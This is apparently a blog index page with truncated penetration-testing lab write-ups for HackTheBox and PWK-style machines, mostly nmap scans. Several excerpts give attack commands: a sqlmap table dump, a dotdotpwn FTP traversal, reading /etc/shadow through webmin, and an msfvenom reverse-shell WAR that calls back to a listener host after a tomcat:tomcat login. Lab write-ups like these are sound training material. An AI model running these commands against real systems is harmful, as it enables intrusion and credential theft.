Jindom's Blog

Nmap 7.70 scan initiated Sat Aug 24 17:56:26 2019 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic\_10.10.10.133.nmap 10.10.10.133 Nmap scan report for 10.10.10.133 Host is up (0.26s latency).PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA) | 256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA) |\_ 256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519) 80/tcp open http Apache ...

第一眼看上去没什么特殊有意思的功能，最后可以提交一个表单，但是实际上表单的功能还没做完，是无法提交的，没什么有意思的。 查看一下源码，发现源码里有一些有意思的注释 看了第一眼猜测可能存在sql injection。 sqlmap跑了一下果然有。 先查看一下有意思的数据库内容。 sqlmap -u http://docker.hackthebox.eu:32943/portfolio.php?id=1 -T safeadmin –dump [21:03:35] [INFO] fetching entries for table ‘safeadmin’ in database ‘freelancer’Database: freelancerTable: safeadmin[1 entry]+—-+———-+————————————————————–+———————+| id | username | password | created_at |+—-+———-+ ...

需要你写一个脚本来自动加密md5字符串然后自动提交，手动太慢，都是提示Too slow！ 参考 https://www.cnblogs.com/qftm/p/11260600.html import requestsimport hashlibimport re url=”http://docker.hackthebox.eu:34650/" r=requests.session()out=r.get(url) rr = re.compile(r”(\S+)“, re.I)str1 = rr.findall(out.text)str2=hashlib.md5(str1[0].encode(‘utf-8’)).hexdigest() data={‘hash’: str2}out = r.post(url = url, data = data) print(out.text)

主页上并没有发现有意思的点，鉴于题目名字，直接上dirbuster fuzzing。 一开始只fuzzing出来了/api和其他的一级目录，直接访问/api会一直等待返回数据，直接继续fuzzing二级目录。 访问 发现需要参数，尝试fuzzing参数，可以用burp也可以继续用dirbuster fuzzing出来发现是 reset 还需要fuzzing id

PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) | ftp-anon: Anonymous FTP login allowed (FTP code 230) |\_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.7 | Logged in as ftp | TYPE: ASCII | No session upload bandwidth limit | No session download bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0 ...

Nmap扫描，发现开放了ssh和http PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |\_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |\_http-server-header: Apache/2.4.18 (Ubuntu) |\_http-title: Home page Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_ke ...

如果遇到nc或者telnet的时候不能用方向键 比如方向键上变成 ^]]D 这种情况，可以在telnet或者nc之前加上rlwarp来解决

enum4linux扫描一下，发现低版本的samba 2.2.7 https://www.exploit-db.com/exploits/10/ 编译运行

Quick_10.11.1.116.nmap 10.11.1.116 Nmap scan report for 10.11.1.116 Host is up (0.27s latency). Not shown: 836 closed ports, 158 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 110/tcp open pop3 143/tcp open imap 3306/tcp open mysql MAC Address: 00:50:56:89:1E:9B (VMware) dirbuster found two webapps on port80 one is phpLiteadmin and one is CuppaCMS phpLiteAd ...

21/tcp open ftp Acritum Femitter Server ftpd 123/tcp open ntp? thanks so much to EL port 21 Femitter Server ftpd has a Directory Traversal exp https://www.exploit-db.com/exploits/15445 dotdotpwn -h 10.11.1.125 -m ftp -f ../../../../../../windows/system32/eula.txt windows xp sp3 france port 123 is a hidden http service called minishare https://www.exploit-db.com/exploits/636 or msf remember to modify target and use non-stage shell, modify EXITFUNC ...

dirbuster found hidden page and script var sillydate = 0;var sillyvar = 0; function StringArray(_0x5b7ex4) { this[‘length’] = _0x5b7ex4; for (var _0x5b7ex5 = 1; _0x5b7ex5 <= _0x5b7ex4; _0x5b7ex5++) { this[_0x5b7ex5] = ‘ ‘; };};image = new StringArray(10);image[0] = ‘offsecphun1.gif’;image[1] = ‘offsecphun2.png’;image[2] = ‘offsecphun1.gif’;image[3] = ‘offsecphun2.png’;image[4] = ‘offsecphun1.gif’;image[5] = ‘of ...

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-01 11:30 CST Nmap scan report for 10.11.1.136 Host is up (0.28s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 113/tcp open ident 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:93:19:D4 (VMware) Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds admin/smb/samba_symlink_traversal read the root filesystem … get shell refer to gotmilk tutorial

Nmap scan report for 10.11.1.141 Host is up (0.29s latency). Not shown: 938 closed ports, 58 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind 3306/tcp open mysql 10000/tcp open snet-sensor-mgmt MAC Address: 00:50:56:89:79:72 (VMware) port 10000 webmin has dictory travel exp able to access /etc/shadow and /root/proof.txt

Nmap scan report for 10.11.1.145 Host is up (0.25s latency). Not shown: 995 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 8080/tcp open http-proxy MAC Address: 00:50:56:89:44:7E (VMware) Nmap done: 1 IP address (1 host up) scanned in 18.90 seconds Host script results: |_samba-vuln-cve-2012-1182: Could not negotia ...

Nmap scan report for 10.11.1.146 Host is up (0.28s latency). Not shown: 985 closed ports, 13 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh MAC Address: 00:50:56:89:06:61 (VMware) Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds ProFTPD 1.3.3a has exp https://github.com/Muhammd/ProFTPD-1.3.3a

running tomcat tomcat manager password tomcat:tomcat upload war file root@kali:~/PWK/10.11.1.209# msfvenom -p java/shell_reverse_tcp LHOST=10.11.0.80 LPORT=443 -f war >> shell.war [47/721] Payload size: 13400 bytes Final size of war file: 13400 bytes http://10.11.1.209:8080/shell

# Nmap 7.70 scan initiated Thu May 2 19:23:53 2019 as: nmap -Pn -sCV -p21,80,135,139,443,445,1030,1032,1033,1038,1521,2030,2100,3372,3389,4443,7778,8080 -oN nmap/Basic_10.11.1.202.nmap 10.11.1.202 Nmap scan report for 10.11.1.202 Host is up (0.28s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 5.0 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT version 5.0 80/tcp open http Microsoft IIS httpd 5.0 | http-cookie-flags: | &# ...

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-03 13:12 CST Nmap scan report for 10.11.1.217 Host is up (0.29s latency). Not shown: 987 closed ports, 2 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 443/tcp open https 993/tcp open imaps 995/tcp open pop3s 3306/tcp open mysql 4 ...

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-03 20:52 CST Nmap scan report for 10.11.1.219 Host is up (0.25s latency). Not shown: 999 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http MAC Address: 00:50:56:89:12:24 (VMware) Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds http://10.11.1.219/html5/ PortKnoking

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-04 14:40 CST Warning: 10.11.1.223 giving up on port because retransmission cap hit (1). Nmap scan report for 10.11.1.223 Host is up (0.27s latency). Not shown: 853 closed ports, 134 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3306/tcp open mysql 33 ...